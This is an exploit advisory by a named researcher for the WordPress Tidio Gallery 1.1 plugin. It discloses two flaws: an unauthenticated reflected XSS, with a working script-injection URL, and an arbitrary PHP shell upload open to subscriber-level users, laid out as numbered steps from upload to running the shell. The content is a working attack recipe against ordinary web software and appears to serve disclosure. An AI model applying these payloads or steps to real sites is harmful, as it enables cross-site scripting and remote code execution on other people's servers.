###################### # Exploit Title : Wordpress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities # Exploit Author : Claudio Viviani # Vendor Homepage : http://www.tidioelements.com/ # Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip # Date : 2014-07-14 # Tested on : Windows 7 / Mozilla Firefox ###################### # Location : http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell ###################### # Vulnerablity n°1: XSS Reflected Unauthenticated http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script> # Vulnerablity n°2: Unprivileged user like subscriber could upload shell script. The plugin rename file with "md5(microtime())" php functions. 1) Connect to url: http://VICTIM/wp-admin/admin-ajax.php?action=tidio_gallery_popup_insert_post 2) Click "add gallery" button 3) Click "edit" option 4) Click "add image" button 5) Click "upload" option and select php shell from local drive 6) Refresh page (ex. press F5 key) 7) View source page (ex. right-click -> view source page) and search string like this: "fileUrl":"http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php" Skip file with "*-thumb.php" extension. 8) Open browser and connect to http://VICTIM/wp-content/uploads/2014/07/14625a7ca5df93c49910a502ef9aabfb.php ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ #####################